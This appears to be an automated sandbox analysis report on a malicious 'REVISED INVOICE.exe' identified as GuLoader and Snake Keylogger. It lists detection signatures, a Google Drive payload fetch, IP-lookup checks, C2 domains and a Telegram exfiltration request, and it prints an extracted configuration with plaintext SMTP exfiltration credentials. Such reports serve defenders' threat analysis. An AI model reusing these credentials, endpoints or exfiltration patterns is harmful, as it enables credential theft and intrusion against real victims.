Windows Analysis Report
REVISED INVOICE.exe

Overview

General Information

Sample name:	REVISED INVOICE.exe
Analysis ID:	1541088
MD5:	8274b1a41b53bf35e0b4330a20010d4c
SHA1:	0b263f01dd3e10389cd4fe6575d114ea301ee874
SHA256:	d2320e5704e90bc713c59a0521bacf04ca5751c2481e1dd4e3a95494981d867c
Infos:

Detection

GuLoader, Snake Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Early bird code injection technique detected

Found malware configuration

Yara detected GuLoader

Yara detected Snake Keylogger

Yara detected Telegram RAT

AI detected suspicious sample

Initial sample is a PE file and has a suspicious name

Powershell drops PE file

Queues an APC in another process (thread injection)

Suspicious powershell command line found

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains functionality for read data from the clipboard

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries the volume information (name, serial number etc) of a device

Sigma detected: Msiexec Initiated Connection

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: Suspicious DNS Query for IP Lookup Service APIs

Stores large binary data to the registry

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Signatures

AV Detection

Found malware configuration

Source: 00000005.00000002.629157566.0000000022131000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "alex@jballosewage.com", "Password": "Jc.2o3o@", "Host": "smtp.ionos.fr", "Port": "587", "Version": "4.4"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Uses 32bit PE files

Source: REVISED INVOICE.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown

HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49165 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.22:49162 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.22:49163 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49181 version: TLS 1.2

Source: REVISED INVOICE.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:

Binary string: e:\Windows\System.Core.pdbpdbore.pdb source: powershell.exe, 00000003.00000002.481790461.0000000004E36000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\REVISED INVOICE.exe	Code function: 0_2_00406362 FindFirstFileW,FindClose,	0_2_00406362
Source: C:\Users\user\Desktop\REVISED INVOICE.exe	Code function: 0_2_00405810 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405810
Source: C:\Users\user\Desktop\REVISED INVOICE.exe	Code function: 0_2_004027FB FindFirstFileW,	0_2_004027FB

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 214B9449h	5_2_214B9188
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 214B9A0Bh	5_2_214B95F8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 214B9A0Bh	5_2_214B993A
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 214BFC19h	5_2_214BF939
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 214BF2E9h	5_2_214BF009
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 214B67D4h	5_2_214B6823
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 214BEE51h	5_2_214BEB70
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	5_2_214B72B2
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 214B9A0Bh	5_2_214B95E8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	5_2_214B6C80
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	5_2_214B7491
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 214BF781h	5_2_214BF4A1
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 214B7945h	5_2_214B7758
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 214B82CFh	5_2_214B7758
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 214B67D4h	5_2_214B6638
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 21588A42h	5_2_21588748
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 21582C69h	5_2_21582998
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2158E052h	5_2_2158DD58
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 21585A19h	5_2_21585748
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2158F83Ah	5_2_2158F540
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 21580C41h	5_2_21580970
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 21587A41h	5_2_21587770
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2158C86Ah	5_2_2158C570
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 21583A31h	5_2_21583760
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2158BA12h	5_2_2158B718
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 215867E1h	5_2_21586510
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 215827D1h	5_2_21582500
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2158D1FAh	5_2_2158CF00
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 21581A09h	5_2_21581738
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2158A22Ah	5_2_21589F30
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 21581EA1h	5_2_21581BD0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2158D6C2h	5_2_2158D3C8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 21583EA1h	5_2_21583BF8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2158A6F2h	5_2_2158A3F8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 21585EB1h	5_2_21585BE0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2158BEDAh	5_2_2158BBE0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2158B082h	5_2_2158AD88
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 21584C51h	5_2_21584980
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2158EEAAh	5_2_2158EBB0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 21586C7Ah	5_2_215869A8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2158989Ah	5_2_215895A0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 21584321h	5_2_21584050
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2158B54Ah	5_2_2158B250
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 21580311h	5_2_21580040
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 21587111h	5_2_21586E40
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 21586349h	5_2_21586078
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2158F372h	5_2_2158F078
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 21582339h	5_2_21582068
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 21589D62h	5_2_21589A68
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 215850E9h	5_2_21584E18
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 21588F0Ah	5_2_21588C10
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 215810D9h	5_2_21580E08
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 21587ED9h	5_2_21587C08
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2158FD02h	5_2_2158FA08
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2158CD32h	5_2_2158CA38
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 21583101h	5_2_21582E30
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2158E51Ah	5_2_2158E220
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 215807A9h	5_2_215804D8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 215875A9h	5_2_215872D8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 215893D2h	5_2_215890D8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 21583599h	5_2_215832C8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2158ABBAh	5_2_2158A8C0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 215847B9h	5_2_215844E8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2158E9E2h	5_2_2158E6E8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2158DB8Ah	5_2_2158D890
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 21585581h	5_2_215852B0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2158C3A2h	5_2_2158C0A8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 21581571h	5_2_215812A0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 21588412h	5_2_215880A0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2169165Ah	5_2_21691360
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 21692E42h	5_2_21692B48
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 21690802h	5_2_21690508
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 21690CCAh	5_2_216909D0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 21693C9Ah	5_2_216939A0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 216924B2h	5_2_216921B8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 21694162h	5_2_21693E68
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2169033Ah	5_2_21690040
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 21691B22h	5_2_21691828
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2169330Ah	5_2_21693010
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 21691FEAh	5_2_21691CF0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 216937D2h	5_2_216934D8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2169297Bh	5_2_21692680
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 21691192h	5_2_21690E98
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	5_2_21725F38
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	5_2_21725F28
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	5_2_21722E16
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	5_2_21722B00

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:760639%0D%0ADate%20and%20Time:%2010/24/2024%20/%208:39:12%20PM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20760639%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 132.226.8.169 132.226.8.169
Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View	JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: Joe Sandbox View	JA3 fingerprint: 36f7277af969a6947a61ae0b815907a1

May check the online IP address of the machine

Source: C:\Windows\SysWOW64\msiexec.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\SysWOW64\msiexec.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\SysWOW64\msiexec.exe	DNS query: name: reallyfreegeoip.org
Source: C:\Windows\SysWOW64\msiexec.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\SysWOW64\msiexec.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\SysWOW64\msiexec.exe	DNS query: name: reallyfreegeoip.org
Source: C:\Windows\SysWOW64\msiexec.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\SysWOW64\msiexec.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\SysWOW64\msiexec.exe	DNS query: name: reallyfreegeoip.org
Source: C:\Windows\SysWOW64\msiexec.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\SysWOW64\msiexec.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\SysWOW64\msiexec.exe	DNS query: name: reallyfreegeoip.org
Source: C:\Windows\SysWOW64\msiexec.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\SysWOW64\msiexec.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\SysWOW64\msiexec.exe	DNS query: name: reallyfreegeoip.org
Source: C:\Windows\SysWOW64\msiexec.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\SysWOW64\msiexec.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\SysWOW64\msiexec.exe	DNS query: name: reallyfreegeoip.org
Source: C:\Windows\SysWOW64\msiexec.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\SysWOW64\msiexec.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\SysWOW64\msiexec.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\SysWOW64\msiexec.exe	DNS query: name: reallyfreegeoip.org
Source: C:\Windows\SysWOW64\msiexec.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\SysWOW64\msiexec.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\SysWOW64\msiexec.exe	DNS query: name: reallyfreegeoip.org

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49167 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49164 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49174 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.22:49162 -> 142.250.186.142:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49166 -> 188.114.97.3:443

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1UdCocYDXIneNm0wsl0RKLwjEdjKNc8DS HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1UdCocYDXIneNm0wsl0RKLwjEdjKNc8DS&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Connection: Keep-AliveCache-Control: no-cacheHost: drive.usercontent.google.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown

HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49165 version: TLS 1.0

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1UdCocYDXIneNm0wsl0RKLwjEdjKNc8DS HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1UdCocYDXIneNm0wsl0RKLwjEdjKNc8DS&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Connection: Keep-AliveCache-Control: no-cacheHost: drive.usercontent.google.com
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:760639%0D%0ADate%20and%20Time:%2010/24/2024%20/%208:39:12%20PM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20760639%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmp

String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 24 Oct 2024 10:03:25 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: msiexec.exe, 00000005.00000002.629157566.0000000022131000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: msiexec.exe, 00000005.00000002.629157566.0000000022131000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: msiexec.exe, 00000005.00000002.629157566.00000000222F4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
